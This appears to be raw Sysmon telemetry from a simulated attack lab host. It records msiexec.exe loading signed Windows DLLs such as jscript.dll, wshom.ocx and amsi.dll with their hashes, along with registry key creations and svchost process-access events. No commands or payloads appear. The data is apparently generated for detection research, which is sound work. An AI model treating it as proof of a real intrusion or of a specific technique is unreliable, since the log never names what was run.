734700x80000000000000002692080Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.616{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\srvcli.dll10.0.14393.5066 (rs1_release.220401-1841)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=75E3DE473374E0BCBBD1EC60036A93EC,SHA256=23EBE577D2080D4C7532184B69E44BF640BB44084F9046A5AF364268A7BDB1ECtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692079Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.616{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\iertutil.dll11.00.14393.5006 (rs1_release.220301-1704)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=153A3C6C45E23363BC842795FD49E7A3,SHA256=06DFA7248890579938106FF7527BB8FD0091A24D1C1667CB6583A4D239885141trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692078Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.616{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\urlmon.dll11.00.14393.5006 (rs1_release.220301-1704)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=72DA72C24A0AD3C49AC956DC083EEDF3,SHA256=2DB817631EC24840FDED7C584BC08F03D3549D93552C8E20005E18BA5E81CA12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002692074Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.616{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SyncRootManagerWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692073Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\wshom.ocx5.812.10240.16384Windows Script Host Runtime LibraryMicrosoft ® Windows Script Host Runtime LibraryMicrosoft Corporationwshom.ocxMD5=012C02BB5DD8EC0FD4AC2688D8D4D0CF,SHA256=B73B3C361F6B07960B092485CE8C96A4E68F741D718C6E847FF37C5BA5227C18trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692046Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\amsi.dll10.0.14393.4169 (rs1_release.210107-1130)Anti-Malware Scan InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationamsi.dllMD5=89C79675F7FEDEB6373C9D2045F7B7C5,SHA256=5B40293CF56D44377A91BF68CF2113F523B61185F02DEEAB621BE51F0ADA6131trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002692021Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace\DelegateFoldersWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002692020Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpaceWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692019Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\actxprxy.dll10.0.14393.3808 (rs1_release.200707-2105)ActiveX Interface Marshaling LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationActXPrxy.dllMD5=087C47C19BBFCB9F4932C03C0189E86B,SHA256=9BEE35FBFA2E595372D82E8858BE46CE7717E0399996960398BC238F4D0E5207trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692016Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\jscript.dll5.812.10240.16384Microsoft ® JScriptMicrosoft ® JScriptMicrosoft Corporationjscript.dllMD5=017AA3E55F15439E32C6F461E5686CCD,SHA256=8117D34017F6F90BC9DC68E3F79346E62E389AFE9E154FF0FCB99FB921845486trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002692002Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\propsys.dll7.0.14393.4169 (rs1_release.210107-1130)Microsoft Property SystemWindows® SearchMicrosoft Corporationpropsys.dllMD5=013D2BA96C261CDC62ECA7365E1C84D5,SHA256=26896478B6F1AF3756D5B1BB59BF2C6BE1C579B122CC882BAC35FEFB3EC3EE36trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691991Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sxs.dll10.0.14393.4169 (rs1_release.210107-1130)Fusion 2.5Microsoft® Windows® Operating SystemMicrosoft CorporationSXS.DLLMD5=54FB18CA661D074CBB60D5A58D40C8D3,SHA256=A2BD6160222A216F8A6830C1273662F8AE88F53D2CE6DA5893FF70D146A0A2B0trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691989Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\version.dll10.0.14393.0 (rs1_release.160715-1616)Version Checking and File Installation LibrariesMicrosoft® Windows® Operating SystemMicrosoft CorporationVERSION.DLLMD5=CFDB018AC09F879CAAE7A66CA7880D57,SHA256=6AB95FD0D142CFFC3B9455AF51F003E1CD75B7F4323820390B975F9E1C8A47A5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691988Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\mpr.dll10.0.14393.2879 (rs1_release_inmarket.190313-1855)Multiple Provider Router DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationmpr.dllMD5=0E56DB60C434D51769F2DAC48B9AA686,SHA256=3F9AED98B1B7F6A59C219F622FD91C7FD20BFE280935F5334920A02ECCAE7ED6trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691987Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-EE56-62A8-1500-000000006202}10483980C:\Windows\system32\svchost.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691986Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-EE56-62A8-1500-000000006202}10481096C:\Windows\system32\svchost.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691985Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=43AEE61AFABE70BFC876CC53D6A64E04,SHA256=8A4C893AEB075D3D9EFEC52E49CEF94471EB9F0A91BEB4C07DF38F8A48910C12trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 12241200x80000000000000002691984Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-CreateKey2022-06-17 15:05:02.600{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exeHKU\S-1-5-21-3078578304-2316546942-2249307483-500\SOFTWARE\Microsoft\Windows Script\SettingsWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691981Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.506{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\RstrtMgr.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)Restart ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationRstrtMgr.dllMD5=F14EA4521A8C000F1165581B5837355E,SHA256=6CB383C1FFB8AB7301B1666EEA83FD484EA049147C834725894652DB20D28359trueMicrosoft WindowsValidNT AUTHORITY\SYSTEM 734700x80000000000000002691956Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=C50C0CEFA633773AB29572E05834F1FE,SHA256=50178F23AA57B31626614C6C65DA2B6518A64FF684FFA18A0F49C4431DFCBEC5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691955Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=57B07BF89C63FA60A810FEDE496126CA,SHA256=080632F80FA2A387E5A55C670FFE07C927D553FDDA26F7F8B4156C0C6B20E75EtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691954Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}40243424C:\Windows\System32\MsiExec.exe{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\system32\msiexec.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\MsiExec.exe+6bca|C:\Windows\System32\MsiExec.exe+7166|C:\Windows\System32\MsiExec.exe+8df7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791WIN-HOST-MHAAG-\AdministratorNT AUTHORITY\SYSTEM 734700x80000000000000002691951Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationucrtbase_clr0400.dllMD5=F8F171BE1820544E15B555847005355C,SHA256=CDDF9A2BF085AE59BA464B3BA6394AACFC342DA5F17D77FD5306054C8AABF153trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002691927Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=0BC84513575743DA177F3DFE18D35CA7,SHA256=C40F6AA73073995E05E5379AE593A6617E8296C79A78BD7F716D95F98AE0D899trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691926Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\SHCore.dll10.0.14393.5066 (rs1_release.220401-1841)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=FC58D75DDAF44088B9101BE2418B1967,SHA256=74A0CCA04F2405A329897A6A1A3E90A0CE48E5772F85E7188C75677CD9D78160trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691925Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=C55F634054E45C0DEE47C254AE009928,SHA256=76EB0FCA87C3AD5FA1C46EB0AF88CF85E172525029E33F5DFC5645EF2EE6F575trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691923Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.584{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\windows.storage.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=BB44598D2B17603D605EDE11A148A21B,SHA256=C45410A330C2EC62581E18FD91F8CDB9873B8F64E5C5ACC79DB4970238077177trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691922Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\System32\vcruntime140_clr0400.dll14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® C Runtime LibraryMicrosoft® Visual Studio® 2017Microsoft Corporationvcruntime140_clr0400.dllMD5=63936588122BDEE9624D02CE3F8F54EA,SHA256=21F7E6165CE8DD92DB8CDF48CEE83DE64B2B0807B7B499CF87678B70C6F8C32FtrueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002691920Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=77BF2979C1A08EBA43C24FE0B7E547BE,SHA256=071E00374806E043A2E78E88C7FDDCE8F5983DE665DF41F3B3210660BF2EF704trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691897Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\shell32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B47A76105A5F59EDA244105A6D5D51D1,SHA256=012675AF0811AA0787D3731FED4D186F6D1B6279F27B2BF360AB49CA457F4E25trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691895Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\msi.dll5.0.14393.5127Windows InstallerWindows Installer - UnicodeMicrosoft Corporationmsi.dllMD5=F8E11A5BD7A918A13BA3C7924B5AD360,SHA256=98B5EBA9E9A0DD04885D594851A6CACF79304F7524959F502F5DA034B2C6BE60trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691894Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.491{7CF983DC-981D-62AC-1A6B-000000006202}4840C:\Windows\System32\msiexec.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll4.8.4510.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Common Language Runtime - WorkStationMicrosoft® .NET FrameworkMicrosoft Corporationclr.dllMD5=5A4968EB301E86C883F154A2C685441B,SHA256=26917633AD13276B97ADB519354C6383F8A86A28A653C1C2BC5EDE1979B94552trueMicrosoft CorporationValidNT AUTHORITY\SYSTEM 734700x80000000000000002691870Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A82FB68F785E73141F5ABC91850595A8,SHA256=416DE0DA209CDCBE9B5D1A868CE972F8FE3399FF62E84EFD46D6FD49BDF7B7B2trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 10341000x80000000000000002691869Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-EE56-62A8-0C00-000000006202}708752C:\Windows\system32\svchost.exe{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\MsiExec.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+40856|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+54f9b|C:\Windows\System32\RPCRT4.dll+5367a|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691868Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=0AF5EF8A7FEFD4B37036B71514FC20CF,SHA256=D4F178583F6F33794D42B4DB11008494E9CD9F069C2AD2CA304DA63F9B5F659CtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691867Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.569{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll6.10 (rs1_release.210107-1130)User Experience Controls LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationcomctl32.DLLMD5=FD486B6FA360ABE43E02E85F3164E9BE,SHA256=733922A216EC03FC6AA405205CD2F8BB81A39180F26839588B97F310E21071B5trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691866Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.553{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\ole32.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=EB53D1BF6E1667C8727EBBB5D5A862ED,SHA256=2B3D48DFA43A284B1C66A8A98B0A48104133D86EEEB2E8E060BE2281CF476348trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691865Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.553{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sechost.dll10.0.14393.5006 (rs1_release.220301-1704)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=9F0F4C38A22FC9FFB8814F77A9563680,SHA256=E9ABDA1063716301F5D06DBC94D6A35B3F53A14B946525E5F764485132DB6166trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691864Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=C42106182CCA611F629E46981D1A0EEA,SHA256=68C134F95A8D38AE84545C8D581F4BF808B6C9D97513EA3CABF019C66419CBAEtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691863Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=E1024CF2E35DD3467F52BC83F7FEDA3F,SHA256=59C87761AD509BD096C2F35257C2370FB94B95160CB63FB9E66DFD8210AB002AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691862Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc_os.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc_os.dllMD5=B80907BCF327C925E7AC990D81A705E6,SHA256=58A71BD4A0DDA6EAE49A50ABF92F73FD1792B218B7F811E06431CEF8EFF77040trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691861Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=63231EA984BC614584102A96D4F35CB4,SHA256=13C5BD283C01B0D50D8D0D99E88FC67F9234FA14A6860AB2B6EE552199FF6A74trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691860Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\winspool.drv10.0.14393.5127 (rs1_release_inmarket.220514-1756)Windows Spooler DriverMicrosoft® Windows® Operating SystemMicrosoft Corporationwinspool.drvMD5=592EDD495F3F412C7E917CABE9B2A15E,SHA256=FC5D6EA6C14E6AA94ADE04D6D0C3AAAB8942864B118DE8219A712133DEF50550trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691859Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\sfc.dll10.0.14393.0 (rs1_release.160715-1616)Windows File ProtectionMicrosoft® Windows® Operating SystemMicrosoft Corporationsfc.dllMD5=22BEEEDFF247B8F90252646C91E775E5,SHA256=10F0FF6F6F21CCC3343BCBCC9B5158A95EC328C1C21F3B9482C688848B89E1DDtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691858Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=54417B63FB3760BC6DBC5DB1BDA4C272,SHA256=B7A8B457B252AB949C067D5FCFEFB2AE98E9115B958D2A0FC120D7B13B3E9FADtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691857Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\rpcrt4.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=920CEBB474555470F1FFB129AD6E19D8,SHA256=DE1C8EA3EF80E7A0E42664559AF3B29FE89E29189382AFC0B438D9C21E2D909AtrueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691856Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=9804D130E8E7178738C2B9808091B427,SHA256=6053B7CC85846F15094475116A8C57BA89FE99FDD1978C54E8A7E2114E318FE3trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691855Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\combase.dll10.0.14393.5127 (rs1_release_inmarket.220514-1756)Microsoft COM for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationCOMBASE.DLLMD5=148F67CE7413EB2D4D777030DFCCD28B,SHA256=5CBD4E213A26B9D8BE56677946D294F65FC615D710F8E07909B643D437819161trueMicrosoft WindowsValidWIN-HOST-MHAAG-\Administrator 734700x80000000000000002691854Microsoft-Windows-Sysmon/Operationalwin-host-mhaag-attack-range-979-2022-06-17 15:05:02.537{7CF983DC-981E-62AC-1D6B-000000006202}4024C:\Windows\System32\msiexec.exeC:\Windows\System32\shlwapi.dll10.0.14393.5125 (rs1_release.220429-1732)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=407E895A220DE1A60C5B555A113FE998,SHA256=FE184347784F83953457146562E0F6C87C8DA04D0288415465631325A2A98C92trueMicrosoft 